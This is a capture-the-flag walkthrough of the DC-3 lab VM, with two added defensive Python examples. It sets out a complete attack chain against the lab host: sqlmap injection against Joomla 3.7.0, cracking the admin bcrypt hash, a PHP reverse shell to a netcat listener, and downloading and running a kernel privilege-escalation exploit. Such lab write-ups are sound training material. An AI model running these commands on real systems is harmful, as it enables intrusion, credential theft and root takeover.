Original Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).
If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
Recon
nmap
root@kali:~/vulnhub/dc3# nmap -sn 10.128.1.150-200
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.00095s latency).
MAC Address: 00:0C:29:7F:2F:B8 (VMware)
root@kali:~/vulnhub/dc3# nmap -A -p- 10.128.1.156
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:7F:2F:B8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.12 ms DC3VM.stoeps.lab (10.128.1.156)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds
A short check with the browser shows us a Joomla web page. Let's check the version and look for possible attacks.
joomscan
root@kali:~/vulnhub/dc3# apt install joomscan
root@kali:~/vulnhub/dc3# joomscan -u http://10.128.1.156
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://10.128.1.156 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://10.128.1.156/administrator/components
http://10.128.1.156/administrator/modules
http://10.128.1.156/administrator/templates
http://10.128.1.156/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://10.128.1.156/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/10.128.1.156/
Not as detailed as wpscan, but enough information for now. We know it's Joomla 3.7.0.
searchsploit
root@kali:~/vulnhub/dc3# searchsploit joomla 3.7
----------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Joomla! 3.7 - SQL Injection | exploits/php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
The file 42033.txt shows the vulnerable request (the list[fullordering] parameter of com_fields) and gives the sqlmap call to use.
42033.txt
...
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
--dbs -p list[fullordering]
...
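From the defender's side, the same request shape is easy to spot in the web server log. The following is an added example, not part of the original write-up: it scans Apache combined-format access log lines (constructed samples embedded below) and flags com_fields requests whose list[fullordering] value is not the "<alias>.<column> ASC|DESC" form Joomla generates itself. The strict allowlist pattern and the log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" access log line: the request line sits in the first quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Joomla builds list[fullordering] itself as "<alias>.<column> ASC|DESC", e.g. "a.ordering ASC".
# On 3.7.0 anything else in that parameter is used unsanitised in the ORDER BY clause,
# which is what the sqlmap call above abuses. Assumed allowlist; tighten for your site.
SAFE_ORDERING = re.compile(r'^[a-z]+\.[a-z_]+ (ASC|DESC)$', re.IGNORECASE)

def check_com_fields_request(uri):
    """Return a reason if the request abuses the com_fields ordering parameter, else None."""
    qs = parse_qs(urlsplit(uri).query, keep_blank_values=True)  # decodes %xx in keys and values
    if qs.get("option") != ["com_fields"]:
        return None
    for value in qs.get("list[fullordering]", []):
        if not SAFE_ORDERING.match(value):
            return f"unexpected list[fullordering] value {value!r}"
    return None

def scan_access_log(lines):
    """Return (client ip, timestamp, status, reason) for each suspicious com_fields request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = check_com_fields_request(m["uri"])
        if reason:
            hits.append((m["ip"], m["ts"], m["status"], reason))
    return hits

# Constructed sample lines: one normal list view, then two requests shaped like the sqlmap run
# above (sqlmap's --random-agent rotates the User-Agent, so do not key detection on it).
SAMPLE_LOG = [
    '10.128.1.10 - - [06/Jan/2020:14:20:01 -0500] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.128.1.20 - - [06/Jan/2020:14:31:12 -0500] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 731 "-" "Mozilla/5.0 (X11; Linux)"',
    '10.128.1.20 - - [06/Jan/2020:14:31:13 -0500] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list[fullordering]=updatexml%281%2C%27x%27%2C1%29 HTTP/1.1" 500 731 "-" "Opera/9.80"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(*hit)
```

A burst of HTTP 500 responses from one client on this URL is the second signal worth alerting on, since error-based injection leans on database errors.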
Attack Joomla
SQLMAP
Get databases
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
-p list[fullordering] --dbs
...
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
...
Get tables
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
-p list[fullordering] -D joomladb --tables
...
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| ... |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
...
- #__users is the user table
Dump table
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
-p list[fullordering] -D joomladb -T \#__users --dump
...
[14:39:05] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
[14:39:05] [INFO] fetching entries for table '#__users' in database 'joomladb'
[14:39:05] [INFO] used SQL query returns 1 entry
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: 'freddy@norealaddress.net'
[14:39:05] [INFO] resumed: '629'
[14:39:05] [INFO] resumed: '2019-04-01 20:27:08'
[14:39:05] [INFO] resumed: 'admin'
[14:39:05] [INFO] resumed: '{"admin_style":"","admin_language":"","language":"","editor":""...
[14:39:05] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[14:39:05] [INFO] resumed: '2019-03-23 09:44:38'
[14:39:05] [INFO] resumed: '1'
[14:39:05] [INFO] resumed: 'admin'
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| Username | Hash                                                         |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
I put user and hash into a text file named user.
user
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
And run John the Ripper on the file.
root@kali:~/vulnhub/dc3# john user
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
...
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy (admin)
1g 0:00:00:08 DONE 2/3 (2020-01-06 14:03) 0.1226g/s 108.5p/s 108.5c/s 108.5C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/vulnhub/dc3# john --show user
admin:snoopy
1 password hash cracked, 0 left
- got the password
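The john output above reports an iteration count of 1024, which is simply 2^10 for the "$2y$10$" cost in the dumped hash; the work factor was fine, the dictionary password was the weakness. As an added example (not from the original post), this parses the bcrypt Modular Crypt Format stored in Joomla's #__users.password column and audits rows for non-bcrypt formats or a cost below a minimum. The legacy row and the min_cost policy are constructed assumptions.

```python
import re

# bcrypt in Modular Crypt Format, as stored in Joomla's #__users.password:
#   $<variant>$<cost>$<22-char salt><31-char digest>, e.g. the admin hash dumped above.
BCRYPT_RE = re.compile(r'^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$')

def parse_bcrypt(hash_str):
    """Split a bcrypt string into its parts; None if it is not a bcrypt hash."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        return None
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    # The cost is a log2 work factor; john shows it as "iteration count" 2**cost.
    return {"variant": variant, "cost": cost, "iterations": 2 ** cost,
            "salt": salt, "digest": digest}

def audit_password_field(username, hash_str, min_cost=10):
    """Return findings for one #__users row: format and work factor only.
    Checking the password itself needs a bcrypt implementation (not in the stdlib)."""
    findings = []
    info = parse_bcrypt(hash_str)
    if info is None:
        # Older Joomla releases stored salted MD5 as "<md5>:<salt>"; anything non-bcrypt is a finding.
        findings.append(f"{username}: password field is not a bcrypt hash")
        return findings
    if info["cost"] < min_cost:
        findings.append(f"{username}: bcrypt cost {info['cost']} is below {min_cost}")
    return findings

def audit_rows(rows, min_cost=10):
    """Audit (username, hash) pairs and collect all findings."""
    out = []
    for username, hash_str in rows:
        out.extend(audit_password_field(username, hash_str, min_cost))
    return out

# Constructed rows: the admin hash from the dump above plus a made-up legacy-format entry.
SAMPLE_ROWS = [
    ("admin", "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"),
    ("legacy", "0123456789abcdef0123456789abcdef:constructedsaltvalue0000000000"),
]

if __name__ == "__main__":
    print(parse_bcrypt(SAMPLE_ROWS[0][1]))
    for finding in audit_rows(SAMPLE_ROWS):
        print(finding)
```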
Joomla login credentials
Remote Shell
Log in to Joomla and use /usr/share/webshells/php/php-reverse-shell.php from Kali. Just change the IP to the one your netcat listener is on.
Now run nc -nlvp 1234 on Kali and open the Joomla page again.
Once the shell connects, upgrade it to a proper TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC3VM:/tmp$ uname -a
Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC3VM:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
Exploit and root flag
I searched for sudoers entries, sticky-bit binaries and other things to get root. Finally I decided to use a kernel exploit.
searchsploit
root@kali:~/vulnhub/dc3# searchsploit ubuntu 16.04
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Sta | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privile | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | exploits/linux/local/40489.txt
- This one (39772) finally worked
DC-3 is a 32-bit machine (i686, see uname above), so we can save time and skip the 64-bit exploits.
Compile and run exploit
www-data@DC3VM:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Saving to: '39772.zip'
39772.zip 100%[===================>] 6.86K --.-KB/s in 0.001s
2020-01-07 07:07:00 (11.2 MB/s) - '39772.zip' saved [7025/7025]
www-data@DC3VM:/tmp$ unzip 39772.zip
www-data@DC3VM:/tmp$ cd 39772
www-data@DC3VM:/tmp/39772$ ls
crasher.tar exploit.tar
www-data@DC3VM:/tmp/39772$ tar -xvf exploit.tar
www-data@DC3VM:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ sh compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC3VM:/root# ls
ls
the-flag.txt
- Compiling throws two warnings (32-bit pointers cast into 64-bit fields on this i686 box), but the exploit works
The flag
root@DC3VM:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order for completing DC-3VM. :-)
I hope you've enjoyed this challenge as much as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
Final thoughts
This time we had to use sqlmap for the first steps. It was also the first machine without additional flags, unlike DC-1 and DC-2.
Thanks to @DCAU7! Looking forward to the other machines in the DC series.